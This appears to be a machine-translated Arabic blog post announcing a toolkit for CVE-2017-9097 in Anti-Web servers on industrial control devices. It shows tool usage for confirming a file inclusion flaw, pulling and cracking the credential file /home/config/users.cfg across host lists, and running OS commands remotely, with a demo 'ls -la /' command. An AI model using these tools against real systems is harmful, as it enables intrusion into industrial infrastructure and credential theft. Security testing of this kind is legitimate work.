
مجموعة أدوات تستغل CVE-2017-9097 (+RCE)
تم العثور على ثغرة أمنية في تطبيقات الويب المرتبطة بـ ICS/OT والتي تعمل على خوادم Anti-Web (حتى الإصدار 3.8.7). الثغرات التي تم تحديدها تؤثر على العديد من الشركات المصنعة المعروفة في صناعة أتمتة العمليات الصناعية والاتصالات. هذه الأجهزة لديها بالفعل ثغرتان مشابهتان وقديمتان (CVE-2010-4730 & CVE-2010-4733) وبعد الإبلاغ، تم الحصول على ثغرة ثالثة (CVE-2017-9097) وأصدر البائع على الفور تصحيحًا. ثم تبع ذلك تصحيحات أخرى على الفور.
للحصول على فكرة تقريبية عن مدى تعرض هذه الأجهزة، نعتمد على المضيفات المفهرسة في Shodan، والتي يزيد عددها قليلاً عن 800 جهاز يحتمل أن تكون ضعيفة.

فيما يتعلق بثغرة LFI التي تحاول أداتنا استغلالها، فإن الشركات المصنعة المتأثرة المختلفة لديها الآن تصحيحات رسمية خاصة بها تعالج الثغرة. لذلك، فإن محاولة استغلال الثغرة تأتي لتأكيد التزام المشغلين والمسؤولين عن هذه التقنيات، مجيبة على سؤال أساسي: "هل تم تثبيت التصحيحات المناسبة؟"
إحدى الأدوات الأولى تحاول استغلال وتأكيد وجود LFI. أداة ثانية تحاول الاستفادة من LFI، عن طريق أخذ الملف الذي يتم فيه حفظ بيانات الاعتماد التي تسمح بالوصول إلى لوحة الويب. حيث تكون أسماء المستخدمين بنص عادي وكلمات المرور مشفرة بـ MD5، وستحاول الأداة كسرها. وأخيرًا، أداة أخيرة تستغل RCE.
usr@pwn:~$ git clone https://github.com/ezelf/AntiWeb_testing-Suite
usr@pwn:~$ cd AntiWeb_testing-Suite
usr@pwn:~$ ls -l
total 16
drwxr-xr-x 4 root root 4096 sep 14 21:05 LFI
drwxr-xr-x 4 root root 4096 sep 14 21:05 RCE
-rwxrwxr-x 1 root root 1852 sep 24 08:42 README.md
drwxr-xr-x 3 root root 4096 sep 24 08:00 seekAndDestroy
تقوم ببساطة بتأكيد وجود LFI، عن طريق الاستعلام عن مسارات محددة مسبقًا و/أو إعطاء المستخدم إمكانية تمرير مساره الخاص.
اختياريًا، يمكن للمرء تمرير ملف تعريف ارتباط جلسة (صالح).
usr@pwn:~$ python anti-web-v1.py --help
usage: anti-web.py [-h] [-v] --host HOST [--port PORT] [--file LFI]
[+] CVE: CVE-2017-9097
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST host
--port PORT Set port (default = 80)
--file LFI Test LFI
-ck COOKIE Set Cookie
[+] Demo: anti-web.py --host 192.168.1.100 --port 80

تحاول هذه الأداة استخدام LFI بشكل جيد. حيث تستهدف الملف "/home/config/users.cfg" الذي يحتوي على بيانات الاعتماد التي تسمح بالوصول إلى تطبيق الويب.

"Seek And Destroy" تقوم بتحليل هذا الملف، وتحديد التجزئة (hash) التي تتوافق مع دمج كلمة المرور واسم المستخدم بعد تمريرها عبر دالة تجزئة MD5. باستخدام قوائم محسوبة مسبقًا، سيتم اكتشاف ما يختبئ وراء هذه التجزئات.

يمكن مهاجمة مضيف واحد بشكل فردي أو قائمة من المضيفات.
usr@pwn:~$ python seekAndDestroy.py --help
usage: seekAndDestroy.py [-h] [-v] [--host HOST] [--list HOST_LIST]
[--port PORT]
[+] Obtain and break the credentials of your industrial control system .
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST host
--list HOST_LIST hosts
--port PORT set port (default = 80)
[+] Usage: seelAndDestroy.py --list host_list.txt --port 8080
وها قد وصلنا إلى ما قد يكون الأكثر إثارة للاهتمام، إمكانية تنفيذ أوامر نظام التشغيل للعتاد الذي يدعم النظام الضعيف. *** "من Http إلى الصدفة" ***
.

#### يتبع... (غدًا الاثنين. xd)
usr@pwn:~$ python rce.py --help
usage: RCE.py [-h] [-v] --host HOST [--port PORT] -ck COOKIE --cmd COMMAND
[+] COMMANDS over your industrial control system .
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
-ck COOKIE Cookie
--cmd COMMAND Command
[+] Demo: python rce.py --host <host> -ck <sessionCookie> --cmd "ls -la /"
....انتظر
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9097
* https://ics-cert.us-cert.gov/advisories/ICSA-17-222-05
* https://www.seebug.org/vuldb/ssvid-96555 (RCE)
* https://www.seebug.org/vuldb/ssvid-96556 (LFI)
* https://vuldb.com/es/?id.102570
* https://github.com/hoytech/antiweb/
* https://nvd.nist.gov/vuln/detail/CVE-2017-9097
* https://www.9165619.com/vulnerability/cve-2017-9097-89702
* http://old.cnnvd.org.cn/vulnerability/show/cv_id/2017051027
* http://jvndb.jvn.jp/ja/contents/2017/JVNDB-2017-005240.html
* http://plugins.openvas.org/nasl.php?oid=106886 (*down)
* http://webcache.googleusercontent.com/search?q=cache:Z1VaYjaZLB4J:plugins.openvas.org/nasl.php%3Foid%3D106886+&cd=1&hl=es-419&ct=clnk&gl=cl
''' [+] CVE-2009-4462 ( Intellicom NetBiterConfig.exe ) [+] CVE-2009-4463 ( Intellicom NetBiterConfig.exe ) (http://blog.48bits.com/exposing-hms-hicp-protocol-0day-light/)
[+] CVE-2010-4730 ( Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA )
[+] CVE-2010-4731 ( Absolute path traversal vulnerability in cgi-bin/read.cgi in WebSCADA )
[+] CVE-2010-4732 ( RCE, using a config.html 2.conf action to replace the logo page's GIF image file )
[+] CVE-2010-4733 ( default username and password to obtain superadmin access via the web interface )
Intellicom NetBiter products based on the NB100 and NB200 platforms, including:
WebSCADA (WS100)
WebSCADA (WS200)
Easy Connect (EC150)
Modbus RTU – TCP Gateway (MB100)
Serial Ethernet Server (SS100).
* https://ics-cert.us-cert.gov/advisories/ICSA-10-316-01A
'''
الأدوات المعنية موجودة في (AntiWeb_testing-Suite): https://github.com/ezelf/AntiWeb_testing-Suite/
فيديو يجمع الأدوات الثلاث في نسختها التجريبية الأولى: https://www.youtube.com/watch?v=HdkZA1DO08Y